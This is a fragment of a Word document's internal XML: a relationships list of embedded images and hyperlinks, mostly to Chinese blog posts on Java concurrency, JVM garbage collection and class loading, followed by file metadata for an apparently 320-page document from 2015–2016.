Target="media/image101.jpeg"/><Relationship Id="rId235" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.open-open.com/lib/view/open1363572227609.html" TargetMode="External"/><Relationship Id="rId256" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baike.com/sowiki/AJAX?prd=content_doc_search" TargetMode="External"/><Relationship Id="rId277" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://netsecurity.51cto.com/art/200812/102951.htm" TargetMode="External"/><Relationship Id="rId298" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image144.jpeg"/><Relationship Id="rId116" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image61.jpeg"/><Relationship Id="rId137" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image72.gif"/><Relationship Id="rId158" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId302" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image146.png"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.cnblogs.com/ITtangtang/p/3948406.html" TargetMode="External"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/2957252.htm" TargetMode="External"/><Relationship Id="rId62" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image27.png"/><Relationship Id="rId83" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://java.sun.com/docs/books/performance/1st_edition/html/JPAppGC.fm.html" TargetMode="External"/><Relationship Id="rId179" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId190" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.th7.cn/Program/java/201512/723018.shtml" TargetMode="External"/><Relationship Id="rId204" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image93.png"/><Relationship Id="rId225" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/751.htm" TargetMode="External"/><Relationship Id="rId246" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image120.png"/><Relationship Id="rId267" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.rising.com.cn/newsletter/news/2011-08-18/9621.html" TargetMode="External"/><Relationship Id="rId288" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image140.png"/><Relationship Id="rId106" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.codeceo.com/article/java-classloader.html" TargetMode="External"/><Relationship Id="rId127" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/luanlouis/article/details/40148053" TargetMode="External"/><Relationship Id="rId313" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image152.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void(0);" TargetMode="External"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image14.jpeg"/><Relationship Id="rId52" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image21.jpeg"/><Relationship Id="rId73" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://java.sun.com/j2se/1.5.0/docs/guide/vm/server-class.html" TargetMode="External"/><Relationship Id="rId94" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image49.png"/><Relationship Id="rId148" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E7%BA%BF%E7%A8%8B&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId169" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml"/><Relationship Id="rId180" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId215" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image102.jpeg"/><Relationship Id="rId236" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://chenjc-it.iteye.com/blog/1460990" TargetMode="External"/><Relationship Id="rId257" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.baike.com/sowiki/Web%E6%9C%8D%E5%8A%A1%E5%99%A8?prd=content_doc_search" TargetMode="External"/><Relationship Id="rId278" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://netsecurity.51cto.com/art/200811/97281.htm" TargetMode="External"/><Relationship Id="rId303" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.bubuko.com/infodetail-1414938.html" TargetMode="External"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/1118088.htm" TargetMode="External"/><Relationship Id="rId84" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9rHbkrHR1ryn1rjRduj-W0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1RsnHT3PW03P0" TargetMode="External"/><Relationship Id="rId138" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image73.gif"/><Relationship Id="rId191" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://hellosure.iteye.com/blog/1126541" TargetMode="External"/><Relationship Id="rId205" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image94.png"/><Relationship Id="rId247" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/751.htm" TargetMode="External"/><Relationship Id="rId107" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.sina.com.cn/s/blog_56d8ea90010127ks.html" TargetMode="External"/><Relationship Id="rId289" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/chen77716/article/details/6166675" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.gif"/><Relationship Id="rId53" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/os/xuniji/" TargetMode="External"/><Relationship Id="rId149" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E6%9D%A1%E4%BB%B6%E5%8F%98%E9%87%8F&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId314" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image153.jpeg"/><Relationship Id="rId95" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image50.jpeg"/><Relationship Id="rId160" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId216" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image103.jpeg"/><Relationship Id="rId258" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image122.jpeg"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="javascript:void()" TargetMode="External"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image29.jpeg"/><Relationship Id="rId118" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image62.png"/><Relationship Id="rId171" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId227" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.tuicool.com/articles/EJf2Qbn" TargetMode="External"/><Relationship Id="rId269" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.2cto.com/os/" TargetMode="External"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://javarevisited.blogspot.com/2013/02/concurrenthashmap-in-java-example-tutorial-working.html" TargetMode="External"/><Relationship Id="rId129" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image68.png"/><Relationship Id="rId280" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image133.png"/><Relationship Id="rId75" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://itindex.net/detail/18325-jvm-%E5%9E%83%E5%9C%BE%E5%9B%9E%E6%94%B6-gc" TargetMode="External"/><Relationship Id="rId140" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image75.gif"/><Relationship Id="rId182" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/aesop_wubo/article/details/7537960" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footnotes" Target="footnotes.xml"/><Relationship Id="rId238" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://blog.csdn.net/prince2270/article/details/5891085" TargetMode="External"/><Relationship Id="rId291" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://static.oschina.net/uploads/img/201212/25151024_hgTU.jpg" TargetMode="External"/><Relationship Id="rId305" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image147.png"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/133754.htm?fr=aladdin" TargetMode="External"/><Relationship Id="rId86" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E5%8D%95%E4%BE%8B%E6%A8%A1%E5%BC%8F&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9rHbkrHR1ryn1rjRduj-W0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6K1TL0qnfK1TL0z5HD0IgF_5y9YIZ0lQzqlpA-bmyt8mh7GuZR8mvqVQL7dugPYpyq8Q1RsnHT3PW03P0" TargetMode="External"/><Relationship Id="rId151" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.baidu.com/s?wd=%E8%BD%AE%E8%AF%A2&amp;tn=44039180_cpr&amp;fenlei=mv6quAkxTZn0IZRqIHckPjm4nH00T1d9m10LPvRkujbdmW0dnyDL0ZwV5Hcvrjm3rH6sPfKWUMw85HfYnjn4nH6sgvPsT6KdThsqpZwYTjCEQLGCpyw9Uz4Bmy-bIi4WUvYETgN-TLwGUv3EnHRLPHfznWn4Pjb1PWm4rjT3n0" TargetMode="External"/><Relationship Id="rId193" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image82.png"/><Relationship Id="rId207" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image96.png"/><Relationship Id="rId249" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://aijuans.iteye.com/blog/2154373" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId109" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://baike.baidu.com/view/627351.htm" TargetMode="External"/><Relationship Id="rId260" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image124.jpeg"/><Relationship Id="rId316" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image15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31B63EB8-C179-4BBE-80AB-1CC8E5EA6E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24874</TotalTime>
  <Pages>320</Pages>
  <Words>45250</Words>
  <Characters>257925</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>2149</Lines>
  <Paragraphs>605</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>302570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lyb</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>鲁友炳</cp:lastModifiedBy>
  <cp:revision>3122</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-09-04T11:58:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2016-07-18T10:56:00Z</dcterms:modified>
</cp:coreProperties>
</file>